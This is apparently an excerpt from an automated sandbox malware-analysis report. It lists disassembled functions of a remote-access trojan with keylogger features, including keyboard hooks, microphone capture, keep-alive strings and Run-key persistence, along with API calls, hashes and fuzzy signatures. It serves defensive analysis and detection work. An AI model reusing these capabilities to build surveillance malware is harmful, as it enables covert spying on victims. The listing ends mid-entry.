                                                                                                        • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                        Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                        • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                        • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                        • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                        Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                        • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                        • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                        • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                        Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                          • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                          • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 737400349-0
                                                                                                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                        • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                        • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                        Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                        • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177248105-0
                                                                                                        • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                        • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                        • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                        • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                        Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3919263394-0
                                                                                                        • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                        • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                        • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                        • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                        Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 4116985748-0
                                                                                                        • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                        • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                        • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                        • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                        Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 39102293-0
                                                                                                        • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                        • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                        • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                        • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                        Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandling__start
                                                                                                        • String ID: pow
                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                        • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                        • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                        • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                        • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                        Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Info
                                                                                                        • String ID: $fD
                                                                                                        • API String ID: 1807457897-3092946448
                                                                                                        • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                        • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                        • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                        • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                        Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                        • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                        • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                        Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                        Strings
                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime
                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                        • API String ID: 481472006-1507639952
                                                                                                        • Opcode ID: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                        • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                        • Opcode Fuzzy Hash: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                        • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                        Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime
                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                        • API String ID: 481472006-2430845779
                                                                                                        • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                        • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                        • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                        • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                        Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: alarm.wav$xIG
                                                                                                        • API String ID: 1174141254-4080756945
                                                                                                        • Opcode ID: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                        • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                        • Opcode Fuzzy Hash: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                        • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                        Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                        • Opcode ID: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                        • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                        • Opcode Fuzzy Hash: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                        • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                        Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                                        • String ID: T=G
                                                                                                        • API String ID: 2315374483-379896819
                                                                                                        • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                        • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                        Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocaleValid
                                                                                                        • String ID: IsValidLocaleName$j=D
                                                                                                        • API String ID: 1901932003-3128777819
                                                                                                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                        • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                        • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                        Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog
                                                                                                        • String ID: T=G$T=G
                                                                                                        • API String ID: 3519838083-3732185208
                                                                                                        • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                        • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                        • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                        • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                        Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                          • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                        • String ID: [AltL]$[AltR]
                                                                                                        • API String ID: 2738857842-2658077756
                                                                                                        • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                        • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                        Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00448825
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFreeHeapLast_free
                                                                                                        • String ID: `@$`@
                                                                                                        • API String ID: 1353095263-20545824
                                                                                                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                        • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                        • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                        Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: State
                                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                                        • API String ID: 1649606143-2446555240
                                                                                                        • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                        • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                        Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteOpenValue
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
